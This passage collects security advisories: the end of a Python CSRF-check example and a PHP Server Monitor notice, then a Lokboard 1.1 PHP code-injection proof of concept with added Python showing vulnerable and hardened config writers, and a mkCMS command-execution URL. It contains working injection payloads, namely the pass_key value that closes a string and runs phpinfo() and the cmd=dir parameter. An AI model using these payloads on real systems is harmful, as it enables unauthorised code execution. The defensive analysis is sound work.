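    # fallback). A value naming another site is a forgery even if the token
    # somehow leaked. Absence is tolerated because some clients strip both
    # headers; the token above remains the primary control.
    source = headers.get("Origin") or headers.get("Referer")
    if source is not None and not _same_origin(source, site_origin):
        raise CsrfError("request originated from %r, not %s" % (source, site_origin))
    return True


def is_request_allowed(session, form, headers, method, site_origin) -> bool:
    """Non-raising form of verify_state_change for use in a request handler."""
    try:
        return verify_state_change(session, form, headers, method, site_origin)
    except CsrfError:
        return False
```

Note that the privilege-escalation form above carries every field the save handler expects except a token; with this gate in place the administrator's browser still submits it, and the server still refuses it.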
Exploitation Technique:
=======================
Remote
Severity Level:
=========================================================
High
Disclosure Timeline:
=========================================================
Vendor Notification: NA
Oct 30, 2015 : Public Disclosure
Description:
==========================================================
Request Method(s): [+] GET / POST
Vulnerable Product: [+] PHP Server Monitor 3.1.1
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
source: https://www.securityfocus.com/bid/60459/info
Lokboard is prone to a remote PHP code-injection vulnerability.
An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
Lokboard 1.1 is vulnerable; other versions may also be affected.
POST /lokboard/install/index_4.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/lokboard/install/index_3.php?error=1
Cookie: lang=; PHPSESSID=g4j89f6110r4hpl3bkecfpc7c1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
host=localhost&user=root&pass=toor&name=lokboard&pass_key=1234";phpinfo();//
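The advisory does not show Lokboard's installer code; the payload's shape (a closing double quote, a statement, then // to comment out the remainder) is what suggests that the installer interpolates posted values straight into a PHP configuration file, and that reading is an assumption of mine. On that assumption, the following added Python example (not Lokboard's code) renders the same request body through the vulnerable pattern and through two hardened ones, and includes a crude scanner that shows whether a value escaped its string literal.

```python
import json
from typing import Mapping

# Constructed request body mirroring the PoC's parameters; the writer
# functions below are assumptions about the installer, not its code.
POSTED = {
    "host": "localhost",
    "user": "root",
    "pass": "toor",
    "name": "lokboard",
    "pass_key": '1234";phpinfo();//',
}


def render_php_config_vulnerable(values: Mapping[str, str]) -> str:
    """Assumed vulnerable pattern: every posted value is dropped into a
    double-quoted PHP string literal by plain interpolation. The pass_key
    above closes the literal with ", appends phpinfo(); as a new statement
    and comments out the dangling "; so the saved file is valid PHP that
    runs phpinfo() every time it is included.
    """
    lines = ["<?php"]
    for name, value in values.items():
        lines.append('$%s = "%s";' % (name, value))
    return "\n".join(lines) + "\n"


def php_string_literal(value: str) -> str:
    """Render a PHP single-quoted literal. Inside ' ... ' only backslash and
    the quote itself are special and no $variable interpolation happens, so
    escaping those two characters is sufficient (this is what var_export()
    does for strings)."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def render_php_config_safe(values: Mapping[str, str]) -> str:
    """Hardened writer: keys are checked against an identifier pattern (they
    should come from our own code anyway) and values always pass through
    php_string_literal()."""
    lines = ["<?php"]
    for name, value in values.items():
        if not name.isidentifier():
            raise ValueError("bad config key %r" % name)
        lines.append("$%s = %s;" % (name, php_string_literal(value)))
    return "\n".join(lines) + "\n"


def render_json_config(values: Mapping[str, str]) -> str:
    """Better still: write data, not code, and json_decode() it at runtime.
    Then nothing the user typed can ever be parsed as PHP."""
    return json.dumps(dict(values), indent=2)


def top_level_semicolons(php_line: str) -> int:
    """Count ';' that sit outside string literals on one line of PHP, with
    '//' starting a comment. A crude stand-in for PHP's tokenizer, but enough
    to tell whether a value broke out of its literal: a config assignment
    should yield exactly 1.
    """
    count, quote, i = 0, None, 0
    while i < len(php_line):
        ch = php_line[i]
        if quote:
            if ch == "\\":
                i += 2  # skip the escaped character
                continue
            if ch == quote:
                quote = None
        elif ch in ("'", '"'):
            quote = ch
        elif php_line.startswith("//", i):
            break
        elif ch == ";":
            count += 1
        i += 1
    return count
```

Run against the PoC's body, the vulnerable writer produces the line $pass_key = "1234";phpinfo();//"; which the scanner counts as two statements, while the safe writer produces $pass_key = '1234";phpinfo();//'; with the whole value still inside one literal.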
source: https://www.securityfocus.com/bid/60488/info
mkCMS is prone to an arbitrary PHP code-execution vulnerability.
An attacker can exploit this issue to execute arbitrary PHP code within the context of the affected application.
mkCMS 3.6 is vulnerable; other versions may also be affected.
http://www.example.com/mkCMS/index.php?cmd=dir